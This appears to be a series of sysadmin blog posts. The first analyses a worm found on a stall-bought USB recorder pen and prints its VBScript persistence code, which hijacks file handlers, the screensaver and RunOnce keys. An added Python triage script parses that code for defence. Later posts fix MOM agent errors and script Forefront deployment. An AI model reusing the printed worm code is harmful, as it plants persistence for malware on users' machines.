From China with Love

I received two gifts from a family member returning from China.

It was a lovely thought and I was touched by the gesture.

Both items are of the geek variety and were bought from stalls: one a ballpoint pen with a built-in 2GB USB stick that can act as a voice recorder, the other a 240GB USB stick.

2GB USB voice recorder pen

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especially when the aforementioned relative said he hadn’t seen the 500GB USB flash drive until after he’d bought this one. I thought the largest flash drive currently available was only 128GB, and sadly it appears I was right. A quick search for “240G Sony” quickly turned up this page. This thing is a total fake and is actually a whopping 32MB. However, it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices into a spare Linux machine, just to see if any software was on either. The fake 240GB USB stick was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After quickly imaging the files, I decided to open a copy of the MS-DOS.COM.

The random-looking junk didn’t quite look like normal .COM file junk; if only I could have taken the SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I might have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognise and understand appeared in plain English.

This is some of what I extracted:

Dim fs,rg
Set fs = CreateObject("scripting.filesystemobject")
Set rg = CreateObject("wscript.shell")
On Error Resume Next
rg.RegWrite "HKCR\.vbs\", "VBSFile"
rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"
rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .COM file. Two seconds of searching found that this is a variant of the SillyFDC worm. A write-up of it here talks about how it was slapping US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.
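As an added example (not code from the original post), here is a small Python triage script that pulls the RegWrite calls out of a dump like the one above and names the persistence technique each one sets up. The sample text is the seven lines quoted above; the list of "odd" payload directories is an assumed heuristic, not anything the worm write-up states.

```python
import re

# Constructed sample: the seven RegWrite lines quoted in the post, nothing else.
EXTRACTED_VBS = r'''
rg.RegWrite "HKCR\.vbs\", "VBSFile"
rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"
rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"
'''
# Matches the two-argument form  <obj>.RegWrite "key", "value"  used in the dump.
REGWRITE = re.compile(r'\.RegWrite\s+"([^"]+)"\s*,\s*"([^"]*)"', re.IGNORECASE)
# Directories where autostart/handler binaries do not normally live (assumed heuristic).
ODD_DIRS = ("\\pchealth\\", "\\dllcache\\")

def parse_regwrites(vbs_text):
    """Return (key, value) tuples for every RegWrite call in a WSH script fragment."""
    return REGWRITE.findall(vbs_text)

def classify(key, value):
    """Name the persistence technique a single registry write implements, else None."""
    k = key.lower()
    if "\\shell\\open\\command" in k:
        return "file-type handler hijack"       # opening a .msc/.reg file runs the payload
    if k.endswith("\\scrnsave.exe"):
        return "screensaver hijack"             # idle desktop launches the payload
    if k.endswith("\\screensavetimeout"):
        return "screensaver timeout shortened"  # makes the hijack fire sooner
    if "\\currentversion\\runonce" in k or k.endswith("\\currentversion\\run\\"):
        return "autostart (Run/RunOnce)"
    return None                                 # e.g. restoring the .vbs association

def triage(vbs_text):
    """List every write that installs persistence, flagging odd payload locations."""
    findings = []
    for key, value in parse_regwrites(vbs_text):
        technique = classify(key, value)
        if technique is None:
            continue
        v = value.lower()
        odd = any(d in v for d in ODD_DIRS) or v.endswith(".com")
        findings.append({"key": key, "value": value,
                         "technique": technique, "odd_payload_path": odd})
    return findings

if __name__ == "__main__":
    for f in triage(EXTRACTED_VBS):
        print(f"{f['technique']:32} {'ODD ' if f['odd_payload_path'] else ''}{f['value']}")
```

Every entry it flags here is a key worth checking on a machine the pen was plugged into, before trusting that the antivirus caught everything.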

Moral of the story: if you buy kit like this at the “best price” from a back-street stall, buyer beware. Unless you’re a malware researcher, in which case go mad: it’s Christmas Day with every item bought!

Forefront and MOM agents not playing nice on the MOM console

These annoying errors keep popping up in my Forefront MOM console from Forefront MOM agents on random machines around the network.

Error in the MOM Console

Type: Warning
Provider Name: Application
Event Number: 21294

Description:

The response processor was denied to execute a response. The action account the MOM Agent is using doesn’t have enough privileges. Returned error message: Access is denied.

Type: Warning
Provider Name: Application
Event Number: 21245
Provider Type: Event Log
Source: Microsoft Operations Manager
Category: MOM Agent

Description:

The response processor failed to execute a response. The response returned the error message: The object exporter specified was not found.

Microsoft has a paper on these typical errors:

http://technet.microsoft.com/en-us/library/bb643197(TechNet.10).aspx

My fix to sort out 50+ alerts of these in one fell swoop:

From the MOM console, sort the errors by type, select them, right-click and copy the selected text. Drop it into a text editor, clean it up and get a list of all the computer names.

Drop the computer names into a text file, each on its own line, and save it (FailedTargets.txt).

To cheat and do a batch of quick fixes, my “Superior” batch skills came to the fore and I knocked this up with PsExec. Could have been done with SMS, login scripts or a proper script, but quick and dirty …

Example:

psexec.exe @FailedTargets.txt -c MOMclient.bat

MOMclient.bat contents:

REM Sets the correct dependencies on the MOM service
sc config mom depend= rpcSs/eventLog/winmgmt
REM Stops then starts the MOM service on the target machine
net stop MOM
net start MOM

Nifty VBS for deploying Forefront without MOM

Found this on the Microsoft TechNet forums after hacking up a batch script to do the same sort of thing.

'*****************************************************************
' Purpose: Launches install of Forefront client in
' standalone mode
'*****************************************************************

Option Explicit
Dim WshShell
Dim MsgVar1
Dim MsgVar2

MsgVar1 = "Install Forefront Security"

' Ask before installing; quit if the user says No
MsgVar2 = "Install Microsoft Forefront?" & VbCrLf & VbCrLf _
& "If Yes then please wait for end of job message."
If MsgBox(MsgVar2, vbQuestion + vbYesNo, MsgVar1) = vbNo Then WScript.Quit

Set WshShell = CreateObject("WScript.Shell")

' Run the client setup in standalone (no MOM) mode, hidden window, and wait for it to finish
WshShell.Run "CLIENTSETUP.EXE /nomom", 0, True

MsgVar2 = "Forefront installation has completed."
MsgBox MsgVar2, vbInformation + vbOKOnly, MsgVar1

Set WshShell = Nothing

My hacked batch script doesn’t use clientsetup.exe, just the .msi files, including the latest virus definitions pulled down from the Microsoft Catalog site. Worked for me and fits nicely on a small USB thumb drive.

REM
REM Installs the Forefront client software
REM (assumes the .msi files sit next to this script, e.g. in the root of the thumb drive;
REM  start /wait makes each install finish before the next one begins)
REM
start /wait msiexec /i "%~dp0mp_ambits.msi"
REM
REM Installs the Security State Assessment agent software
REM
start /wait msiexec /i "%~dp0FCSSSA.msi"
REM
REM Install Forefront client definitions of 01-May-2008
REM

The trouble with clones

WSUS and clones, it appears, have a bit of a problem.

Despite sysprep and other steps, cloned machines keep their WSUS ID. Therefore you only ever see one of the cloned machines in the WSUS console. This is a well-known issue, but one I keep forgetting …

To avoid mucking around with purging registry keys, this handy batch or VB script sorts everything out:

http://msmvps.com/blogs/athif/archive/2005/09/04/65174.aspx

Genius!